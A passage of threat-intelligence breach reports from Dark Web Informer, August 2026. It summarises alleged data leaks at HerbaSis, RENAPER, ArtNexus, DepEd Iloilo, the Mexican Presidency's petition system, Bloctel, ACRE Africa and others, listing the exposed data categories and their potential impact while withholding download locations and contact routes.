Hotel Group Cuba database sale listing screenshot, August 2026 (1 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/321478923596782897356982359871.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/321478923596782897356982359871.png) [ ![Gran Caribe Hotel Group Cuba database sale listing screenshot, August 2026 (2 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/321478923596782897356982359872.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/321478923596782897356982359872.png) [ ![Gran Caribe Hotel Group Cuba database sale listing screenshot, August 2026 (3 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/321478923596782897356982359873.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/321478923596782897356982359873.png) ### ⚠Potential impact The **passport numbers are the standout**. Paired with full name, date of birth, and nationality, they form a travel-document identity set usable for account opening and document fraud, and they cannot be changed without applying for a new passport. Because the records also carry **stay dates and room assignments**, the set additionally establishes where identified foreign nationals were on given dates. Employee exposure is deeper still, combining **salary, bank details, home address and national ID**. The **guest internet accounts** warrant separate attention: Cuban internet access is provided through a state monopoly and tied to identity, so credentials and identity numbers together carry risk beyond ordinary account compromise. ### iStatus Unverified The listing is unusually documented, with a database-by-database inventory, row counts, and samples the actor states were restored and verified. Dark Web Informer is **not reproducing the sample archive location or contact routes**. The stated breach date is **the day before posting**, indicating recent access if accurate. This is the same actor behind three separate disclosures published in the past week, operating at high tempo. Nothing has been independently corroborated. The claim is **unverified** and Gran Caribe has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### HerbaSis Database Allegedly Leaked, Exposing Brazilian Customers' Medical Conditions and National ID Numbers URL: https://darkwebinformer.com/herbasis-database-allegedly-leaked-exposing-brazilian-customers-medical-conditions-and-national-id-numbers/ Last updated: 2026-08-11T16:11:17.000Z Breach Report ![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Health & Wellness / SaaS Data Leaked ## HerbaSis Database Allegedly Leaked, Exposing Brazilian Customers' Medical Conditions and National ID Numbers An actor posting as **DarkMafiaX** has published what they describe as the database of **HerbaSis**, a Brazilian business management platform used by independent nutrition consultants to track customers, orders, appointments, and wellness assessments. The schema pairs conventional customer fields with **CPF national identity numbers, dates of birth, full home addresses, weight and height measurements**, and a dedicated **illness field**. Sample records contain that field populated in plain text with conditions including **diabetes, hypertension, heart disease, depression, and arthritis**, attached to named individuals. The platform serves consultants of a global nutrition brand but is a **separate third-party product**. The claim is **unverified**. Severity CRITICAL Health dataPlaintext National IDsCPF FormatSQL & CSV ActorDarkMafiaX ### ▣Post details TargetHerbaSis Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil SectorWellness / Business software ListingLeaked, contact via messenger RecordsNot stated DataCustomer, health, contact ObservedAug 10, 2026 ActorDarkMafiaX ### !Allegedly included - Declared medical conditions - Weight & height - CPF national ID numbers - Full names - Dates of birth - Gender - Home addresses & postcodes - Multiple phone numbers - Email addresses - Occupation - Working hours & contact windows - Referral relationships - Consultant notes - Account password field ### ◱Screenshot [ ![HerbaSis Brazil consultant platform database leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2178645127683548761248765124875612.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/2178645127683548761248765124875612.png) ### ⚠Potential impact Health data is treated as a protected category under Brazil's data protection law for good reason: it **cannot be withdrawn once published** and carries consequences for insurance, employment, and family life. Here the conditions are **recorded explicitly rather than inferred**, and bound to a named person with a CPF, a birth date, and a home address, which is a complete Brazilian identity package alongside a medical profile. The customers were sharing these details to receive nutrition advice, not anticipating publication. Two further fields deepen the exposure: **weight and height**, and **working hours with preferred contact windows**, which together indicate when an individual is reachable and where. ### iStatus Unverified The post publishes a full schema and populated sample but **states no record count**, so the scale cannot be assessed. The schema includes a password column whose storage format is **not determinable** from the sample. Dark Web Informer is not reproducing the contact routes. The **breached party is the third-party platform, not the nutrition brand whose consultants use it**. The account is recent with moderate standing. The claim is **unverified** and HerbaSis has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### HeyPulse Database and Full Source Code Allegedly Leaked, Exposing French Small Business Clients URL: https://darkwebinformer.com/heypulse-database-and-full-source-code-allegedly-leaked-exposing-french-small-business-clients/ Last updated: 2026-08-11T15:40:25.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Marketing SaaS / SMB Point-Gated Download ## HeyPulse Database and Full Source Code Allegedly Leaked, Exposing French Small Business Clients A forum user posting as **slvsh3r** has published what they describe as the database and complete **source code** of **HeyPulse**, a French B2B marketing platform that runs prize-based games to help local businesses generate Google reviews and improve their visibility. The sample database shows client accounts for **restaurants, barbers, hair salons, and food outlets**, each with a business name, contact email, registration date, and password hash. The accompanying file tree covers the application's **authentication, billing, payment, email, and database layers**, with timestamps indicating the code was captured **within the past day**. The claim is **unverified**. Severity HIGH Also takenSource code Passwordsbcrypt CaptureWithin a day Actorslvsh3r ### ▣Post details TargetHeyPulse Country![France flag](https://flagcdn.com/w40/fr.png)France SectorMarketing SaaS ListingPoints to unlock ClientsLocal businesses DataClient accounts and codebase ObservedAug 11, 2026 Actorslvsh3r ### !Allegedly included - Business names - Contact email addresses - bcrypt password hashes - Registration timestamps - Account status flags - Application source code - Configuration files - Payment integration code - Authentication middleware - Database layer - Mail delivery components - Review & prize modules ### ◱Screenshots [ ![HeyPulse French marketing platform database and source code leak screenshot, August 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/37298578926356897235879623968759823.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/37298578926356897235879623968759823.png) [ ![HeyPulse French marketing platform database and source code leak screenshot, August 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/37298578926356897235879623968759824.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/37298578926356897235879623968759824.png) ### ⚠Potential impact The client records are limited and the passwords use **bcrypt**, which is sound practice and makes bulk recovery impractical. The **source code is the real exposure**. The file listing includes configuration, payment, mail, and database components, the places where credentials and API keys are conventionally stored, so **live secrets should be assumed present until the operator confirms otherwise**. The tree also shows **three separate authentication middleware files** alongside debug and test scripts, a pattern that often indicates inconsistent access control and gives any reader a map for finding it. Client businesses face a smaller but real reputational question, since the platform's function concerns review generation. ### iStatus Unverified Samples are published from both the database and the codebase, which is **more substantiation than most listings offer**. File timestamps run to the day of posting, suggesting access was **current at the time of capture** rather than historical. Dark Web Informer is **not reproducing the archive password or contact route**. The account is established with high standing. Nothing has been independently corroborated. The claim is **unverified** and HeyPulse has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Argentina's National Identity Registry Allegedly Leaked, 48 Million Citizen Records With Home Addresses Offered URL: https://darkwebinformer.com/argentinas-national-identity-registry-allegedly-leaked-48-million-citizen-records-with-home-addresses-offered/ Last updated: 2026-08-10T18:50:10.000Z Breach Report ![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina Government / National Registry Free Sample ## Argentina's National Identity Registry Allegedly Leaked, 48 Million Citizen Records With Home Addresses Offered An actor posting as **GordonFreeman** claims to hold the complete database of **RENAPER**, Argentina's **Registro Nacional de las Personas**, the national authority responsible for citizen identity and the issuance of the DNI. The listing describes **48 million records** in a 15.7GB file, with fields covering **DNI number, full name, date of birth, municipality, province, street address, floor and apartment number, and telephone**. That figure is **larger than Argentina's living population**, indicating a registry-wide extract rather than a subset. A sample of one million records has been published as proof, and records in it include **children**. The claim is **unverified**. Severity CRITICAL Records48,000,000 Proof sample1,000,000 Size15.7GB ActorGordonFreeman ### ▣Post details TargetRENAPER Country![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina SectorGovernment / Civil registry ListingSample free, full set on request Records48 million claimed FormatDatabase file, 15.7GB ObservedAug 10, 2026 ActorGordonFreeman ### !Allegedly included - DNI identity numbers - Full names - Dates of birth - Street addresses - Floor & apartment numbers - Municipality - Province - Province of origin - Telephone numbers - Internal person identifiers ### ◱Screenshot [ ![RENAPER Argentina national identity registry database listing screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/23798569278659872656987235987698723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/23798569278659872656987235987698723.png) ### ⚠Potential impact If accurate, the affected population is **effectively everyone in Argentina**. The DNI is the foundation of Argentine identity, required for banking, employment, healthcare, and voting, and it **cannot be reissued to escape exposure**. Pairing it with full name, date of birth, and an address precise to the apartment turns the set into a national residential directory: any named person becomes locatable by anyone holding the file. **Children appear in the sample** with the same completeness as adults. One limiting factor is worth stating: the field list **does not include photographs or biometric records**, which the registry also holds, so this appears to be the demographic core rather than the full identity file. ### iStatus Unverified A one-million-record proof sample is hosted publicly; **Dark Web Informer is not reproducing that location or the contact route**. The record count exceeds the living population, which is consistent with a registry retaining deceased and historical entries but has not been confirmed. The registry has been **the subject of previous security incidents**, so whether this is a new compromise, an aggregation, or recirculated material is unestablished. The account holds moderate standing. The claim is **unverified** and RENAPER has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### ArtNexus Database Allegedly Left Public, Exposing 3,314 Collectors and Galleries With Addresses and Payment Tokens URL: https://darkwebinformer.com/artnexus-database-allegedly-left-public-exposing-3-314-collectors-and-galleries-with-addresses-and-payment-tokens/ Last updated: 2026-08-10T16:32:33.000Z Breach Report ![Colombia flag](https://flagcdn.com/w40/co.png)Colombia Art Market / Marketplace Reported Live ## ArtNexus Database Allegedly Left Public, Exposing 3,314 Collectors and Galleries With Addresses and Payment Tokens An actor posting as **exfilar** claims that **ArtNexus**, a Colombian fine art magazine and marketplace connecting galleries, collectors, and curators across **37 countries**, left its backend database publicly readable with no authentication. The dump is said to contain **3,314 unique email addresses** belonging to gallery owners, private collectors, museum curators, and dealers, **3,455 user accounts**, **834 physical addresses with phone numbers**, 389 art purchase transactions with items and amounts, and **512 payment source tokens in plaintext**. Also included are **private buyer-seller negotiation messages**. Access is reported as **still live**. The claim is **unverified**. Severity CRITICAL StatusReported live Individuals3,314 Payment tokens512 Actorexfilar ### ▣Post details TargetArtNexus Country![Colombia flag](https://flagcdn.com/w40/co.png)Colombia SectorArt market / Publishing ListingReply or upgrade to unlock Volume18MB raw export Reach37 countries, 339 cities ObservedAug 10, 2026 Actorexfilar ### !Allegedly included - Collector email addresses - Gallery owner contacts - Curator & dealer emails - User account identifiers - Shipping addresses - Phone numbers - Purchase transactions - Artwork names & amounts - Checkout records - Payment source tokens - Negotiation messages - Gallery following lists - Subscription records - Backend infrastructure details ### ◱Screenshots [ ![ArtNexus art marketplace database exposure forum post screenshot, August 2026 (1 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/79823597826359876259876237895239872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/79823597826359876259876237895239872.png) [ ![ArtNexus art marketplace database exposure forum post screenshot, August 2026 (2 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/79823597826359876259876237895239873.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/79823597826359876259876237895239873.png) [ ![ArtNexus art marketplace database exposure forum post screenshot, August 2026 (3 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/79823597826359876259876237895239874.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/79823597826359876259876237895239874.png) [ ![ArtNexus art marketplace database exposure forum post screenshot, August 2026 (4 of 4)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/79823597826359876259876237895239875.png) Screenshot 4 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/79823597826359876259876237895239875.png) ### ⚠Potential impact The population is small but unusually exposed. This dataset links **named collectors to the artworks they bought, what they paid, and the address it shipped to**, which is inventory information for high-value portable goods sitting in identified private homes across 37 countries. Discretion is a working condition in this market, and the **negotiation messages** expose commercial terms parties expected to stay private. On the payment tokens, the actor is explicit that **the corresponding secret key is not in the dump**, so the tokens are not directly chargeable as published; the claim is that a further key disclosure would change that. Backend infrastructure details are reported as **reachable now**. ### iStatus Unverified Dark Web Informer is **not reproducing the database location, backend host, image server address, or any payment tokens**, all of which appear in the post while the exposure is reported as unremediated. This is the **twelfth of a stated 25 releases** from the same automated scanning operation behind two disclosures published days earlier, with the actor claiming cumulative totals in the hundreds of databases. The post also **advertises the actor's paid penetration testing services**, which sits awkwardly alongside publishing victim data. The claim is **unverified**. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### DepEd Schools Division of Iloilo Allegedly Breached, Records on Staff, Students and Families With Fingerprint Templates Leaked URL: https://darkwebinformer.com/deped-schools-division-of-iloilo-allegedly-breached-records-on-staff-students-and-families-with-fingerprint-templates-leaked/ Last updated: 2026-08-07T19:15:30.000Z Breach Report ![Philippines flag](https://flagcdn.com/w40/ph.png)Philippines Government / Education Free Download ## DepEd Schools Division of Iloilo Allegedly Breached, Records on Staff, Students and Families With Fingerprint Templates Leaked An actor posting as **citizengod** has published what they describe as the database and source code of the **Schools Division of Iloilo**, the local office of the Philippines' **Department of Education**, which administers schooling from kindergarten to senior high school. The inventory lists roughly **1.06 million name rows covering staff, students, and family members**, alongside government identity numbers, dates of birth, home addresses, family relationships, blood types, salary grades, and **780,000 attendance records**. It also claims **4,739 biometric records including fingerprint template data** and **15,025 password hashes in an obsolete format**. The claim is **unverified**. Severity CRITICAL Name rows\~1.06M Biometric records4,739 Password hashes15,025 Actorcitizengod ### ▣Post details TargetDepEd Schools Division of Iloilo Country![Philippines flag](https://flagcdn.com/w40/ph.png)Philippines SectorGovernment / Basic education ListingFree — reply to unlock SubjectsStaff, students, families Also takenSource code, server details ObservedAug 7, 2026 Actorcitizengod ### !Allegedly included - Fingerprint templates - Names of staff & students - Family member names - Dates of birth - Residential addresses - Tax & pension numbers - Social security identifiers - Professional licence numbers - Blood type, height, weight - Religion & civil status - Parent, spouse, child records - Password hashes - Login activity logs - Salary grades & work history - Attendance records - Source code ### ◱Screenshot [ ![DepEd Schools Division of Iloilo database leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/7235789623562987536987236598762.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/7235789623562987536987236598762.png) ### ⚠Potential impact The **fingerprint templates are the gravest element**. Biometrics cannot be reissued, so a person whose template is published is exposed permanently, with no remediation available at any point in their life. Second is the **presence of students and their family members**: a schools division database ties named children to birth dates, home addresses, and parents. The **government identity numbers** covering tax, pension, social security, health insurance, and professional licensing form a complete Philippine identity package for staff, while **blood type and physical characteristics** add health-adjacent data. Password hashing is described in a format that is **trivially crackable**, so reused credentials should be assumed compromised. ### iStatus Unverified Evidence consists of a category-by-category inventory with counts and a **server configuration dump**, rather than record samples, so individual records cannot be assessed. Dark Web Informer is **not reproducing the server identifiers, addresses, or software details**, which describe a live government system. The account is newly created with no standing. Nothing has been independently corroborated. The claim is **unverified** and the Department of Education has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### LEVI STRAUSS & CO. has Filed Form 8-K Due to a Cybersecurity Incident URL: https://darkwebinformer.com/levi-strauss-co-has-filed-form-8-k-due-to-a-cybersecurity-incident/ Last updated: 2026-08-07T18:50:13.000Z Levi Strauss & Co. (the “Company”) recently detected that the Company experienced a cybersecurity incident in which an unauthorized third party gained access to Company files through social engineering techniques that enabled unauthorized access to three employees’ Company-issued computers. Following such detection, the Company initiated response protocols, implemented containment measures, launched an investigation, which remains ongoing and engaged the services of third-party cybersecurity experts. Based on preliminary findings from the Company’s investigation, the Company believes that certain corporate information was accessed and exfiltrated as a result of the incident. As of the date of this filing, the Company believes that its rapid response efforts successfully contained and terminated the unauthorized access, and that no consumer data was impacted. The Company has not experienced any interruption in business operations as a result of the incident. Based on information available as of the date of this filing, the Company does not believe the incident has had, or is reasonably likely to have, a material impact on the Company’s business strategy, operations, financial condition, or results of operations. The Company has provided and will provide notifications to affected parties and applicable regulators as appropriate and in accordance with applicable law. Source: ### Mexican Presidency's Citizen Petition System Allegedly Breached, 400,000 Citizens and 59 Federal Agencies Exposed URL: https://darkwebinformer.com/mexican-presidencys-citizen-petition-system-allegedly-breached-400-000-citizens-and-59-federal-agencies-exposed/ Last updated: 2026-08-07T16:37:11.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Government / Presidency Free Download ## Mexican Presidency's Citizen Petition System Allegedly Breached, 400,000 Citizens and 59 Federal Agencies Exposed An actor posting as **cenfecracked** claims to have obtained the database behind the **Sistema de Atención Ciudadana**, the platform through which members of the public submit petitions and requests for assistance to the **Mexican Presidency**. The listing describes **400,000+ citizen records** spanning **59 federal agencies**, including the defence, interior, foreign affairs, and health ministries, with records dated to **2026**. Alongside **CURP and RFC national identifiers, dates of birth, occupations, and full home addresses**, the schema covers **the substance of each petition**, its assigned agency, internal official commentary, and the names and contact details of the government analysts handling it. The claim is **unverified**. Severity CRITICAL Citizens400,000+ Agencies59 Records dated2026 Actorcenfecracked ### ▣Post details TargetSistema de Atención Ciudadana Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico SectorGovernment / Executive ListingFree via private channel Records400,000+ citizens Scope59 federal dependencies ObservedAug 7, 2026 Actorcenfecracked ### !Allegedly included - Full names - CURP national identifiers - RFC tax identifiers - Dates of birth - Occupation & civil status - Verified email addresses - Phone numbers - Full home addresses - Petition subject & description - Category and sub-category - Assigned federal agency - Case status history - Internal official comments - Assigned analyst names - Official handler emails - Response documents ### ◱Screenshots [ ![Mexican Presidency citizen attention system database listing screenshot, August 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/435782359786293876589726356987239.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/435782359786293876589726356987239.png) [ ![Mexican Presidency citizen attention system database listing screenshot, August 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/435782359786293876589726356987240.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/435782359786293876589726356987240.png) ### ⚠Potential impact The identifiers alone would be serious, since **CURP, RFC, name, birth date, and home address form the basis of Mexican identity verification** and cannot be reissued. What raises this further is the **content of the petitions**. People approach the Presidency about health, employment, poverty, and security, often in circumstances of real difficulty, and the dataset ties each request to a named person at a known address. Requests routed to the **defence and interior ministries** carry the sharpest risk: identifying who formally approached security institutions, and what about, is information with consequences beyond fraud. The **directory of officials and case handlers** separately enables convincing impersonation of government to those same citizens. ### iStatus Unverified The post publishes a complete schema and a sample record that the actor **partially masked themselves**, alongside an explicit list of intended uses including social engineering and phishing. Dark Web Informer is **not reproducing the distribution channel, contact routes, or official handler addresses**. This actor was **credited alongside the handle behind a separate Mexican state government leak** published days earlier, indicating sustained targeting of Mexican public institutions. The claim is **unverified** and the Presidency has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Bloctel Do-Not-Call Register Allegedly Leaked, 3 Million French Phone Numbers Published Free URL: https://darkwebinformer.com/bloctel-do-not-call-register-allegedly-leaked-3-million-french-phone-numbers-published-free/ Last updated: 2026-08-07T16:20:03.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Government / Consumer Protection Free Download ## Bloctel Do-Not-Call Register Allegedly Leaked, 3 Million French Phone Numbers Published Free An actor posting as **Cybernox** has published what they describe as user data from **Bloctel**, the French government's official register allowing consumers to opt out of unsolicited telephone marketing. The listing claims **3 million records**, and the posted sample shows a minimal structure of **phone numbers paired with internal registration identifiers**, with no names or addresses visible. The release is free across **four separate file mirrors**. The post carries political rhetoric rather than a commercial motive, and the actor states plainly that the value of the data lies in **identifying which numbers are registered**. The claim is **unverified**. Severity HIGH Records3,000,000 Fields2 PriceFree ActorCybernox ### ▣Post details TargetBloctel Country![France flag](https://flagcdn.com/w40/fr.png)France SectorGovernment / Consumer protection ListingFree, four mirrors Records3 million claimed DataPhone numbers and IDs only ObservedAug 6, 2026 ActorCybernox ### !Allegedly included - Mobile phone numbers - Landline numbers - Registration identifiers ### ◱Screenshot [ ![Bloctel French do-not-call register data leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/352397582678349876235987235687921.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/352397582678349876235987235687921.png) ### ⚠Potential impact Two fields make this among the thinnest datasets by content and among the more consequential by function. **A register of people who asked not to be called becomes, once leaked, a list of three million verified live French numbers** — the exact inversion of the protection it was built to provide. Legitimate firms screen against this list; parties willing to ignore it now have it as a target set instead. Registration also skews toward those most troubled by cold calling, which tends to mean **older consumers**, a group already disproportionately targeted by telephone fraud. Free mirrored distribution means it cannot be recalled. ### iStatus Unverified Only four sample rows are published, which is **thin evidence for a three million record claim**, though the identifier format is consistent across them. Dark Web Informer is not reproducing the download mirrors. The post is framed around **anti-EU political rhetoric** rather than profit, and that framing is the actor's own. The account holds moderate standing. The claim is **unverified** and Bloctel has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### ACRE Africa Breach Allegedly Exposes 14,300 Smallholder Farmers Alongside Source Code and Private Keys URL: https://darkwebinformer.com/acre-africa-breach-allegedly-exposes-14-300-smallholder-farmers-alongside-source-code-and-private-keys/ Last updated: 2026-08-07T16:08:06.000Z Breach Report Multi-Region Agricultural Insurance Point-Gated Download ## ACRE Africa Breach Allegedly Exposes 14,300 Smallholder Farmers Alongside Source Code and Private Keys A forum user posting as **888** has published what they describe as a breach of **ACRE Africa**, an authorised insurance intermediary providing agricultural and climate risk cover to smallholder farmers across the continent. The post claims **14,300 user records** together with the company's **source code, configuration files, access tokens, private keys, and hardcoded credentials**. The posted sample shows farmer records carrying **full names, registered mobile numbers, subsidy amounts, field agent codes, and location down to ward level**, with entries concentrated in Zambia alongside Kenyan numbers. The data is offered behind a forum points paywall. The claim is **unverified**. Severity HIGH Farmer records14,300 Also takenSource code RegionsZambia, Kenya Actor888 ### ▣Post details TargetACRE Africa RegionsZambia, Kenya (sample) SectorAgricultural insurance ListingPoints to unlock Records14,300 claimed DataFarmer PII, code, credentials ObservedAug 6, 2026 Actor888 ### !Allegedly included - Farmer names - Registered mobile numbers - Subsidy amounts - Field agent codes - Unique enrolment codes - County & sub-county - Ward-level location - Application source code - Configuration files - Access tokens - Private keys - Hardcoded credentials ### ◱Screenshots [ ![ACRE Africa agricultural insurance data breach forum post screenshot, August 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/97832569871649827365879235698723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/97832569871649827365879235698723.png) [ ![ACRE Africa agricultural insurance data breach forum post screenshot, August 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/97832569871649827365879235698724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/97832569871649827365879235698724.png) ### ⚠Potential impact The affected population makes this heavier than the record count suggests. **Smallholder farmers are among the most economically exposed users of financial services**, and in these markets the registered mobile number is not merely a contact detail but the identifier a mobile money account is built on. A record pairing a farmer's **name, mobile number, ward, assigned agent, and expected subsidy amount** supplies everything needed for a convincing call about a payment the recipient is genuinely waiting for. Separately, **private keys and hardcoded credentials in source code** would represent access risk that persists until rotated, potentially reaching the systems through which those payments move. ### iStatus Unverified A record sample and a repository listing are published as evidence. The post asserts that credentials and keys are present but **does not demonstrate what they reach**, so whether any remain valid is not established. The account is a long-standing forum moderator with high standing. Nothing has been independently corroborated. The claim is **unverified** and ACRE Africa has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### French Basketball Federation Data Allegedly for Sale, 75,831 People and 2,000 CVs Listed URL: https://darkwebinformer.com/french-basketball-federation-data-allegedly-for-sale-75-831-people-and-2-000-cvs-listed/ Last updated: 2026-08-06T20:33:37.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Sport / Governing Body Data for Sale ## French Basketball Federation Data Allegedly for Sale, 75,831 People and 2,000 CVs Listed A seller posting as **weykofa** is advertising what they describe as the database of the **Fédération Française de Basketball**, the national governing body for basketball in France. The listing claims **more than 2,000 files totalling 839MB** in JSON, CSV, and PDF formats, covering **75,831 individuals**, **6,873 clubs**, 16,681 email addresses, and **2,030 CVs**. The posted sample shows club records with names, mobile numbers, personal email addresses, and street addresses for named contacts across regional clubs. The asking price is **$700 in Bitcoin**, described as negotiable. The claim is **unverified**. Severity HIGH People75,831 Clubs6,873 CVs2,030 Actorweykofa ### ▣Post details TargetFédération Française de Basketball Country![France flag](https://flagcdn.com/w40/fr.png)France SectorSport / National federation ListingData for sale — $700, BTC Volume2,000+ files / 839MB FormatsJSON, CSV, PDF ObservedAug 6, 2026 Actorweykofa ### !Allegedly included - Individual names - Mobile numbers - Personal email addresses - Street addresses - Club names & records - Club contact details - Regional affiliations - CVs and résumés - PDF documents ### ◱Screenshot [ ![French Basketball Federation database sale listing screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/4368907235987235987629837597823523.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/4368907235987235987629837597823523.png) ### ⚠Potential impact Club contact details are largely public already, which limits the sensitivity of much of this set. The **2,030 CVs are the exception**: résumés carry employment history, education, personal contact details, and frequently photographs and referee names, all in one document and none of it published voluntarily. Against 75,831 people the wider file also mixes **personal mobile numbers and home addresses** with role information. One question the post does not answer is **whether licensed players are represented among those individuals, and if so whether any are minors**, which would materially change the assessment and is a matter for the federation to establish. ### iStatus Unverified A single sample is published, showing club records only, so the **composition of the remaining categories cannot be assessed** from the post. The stated file size is proportionate to a set containing PDFs alongside structured data. The seller 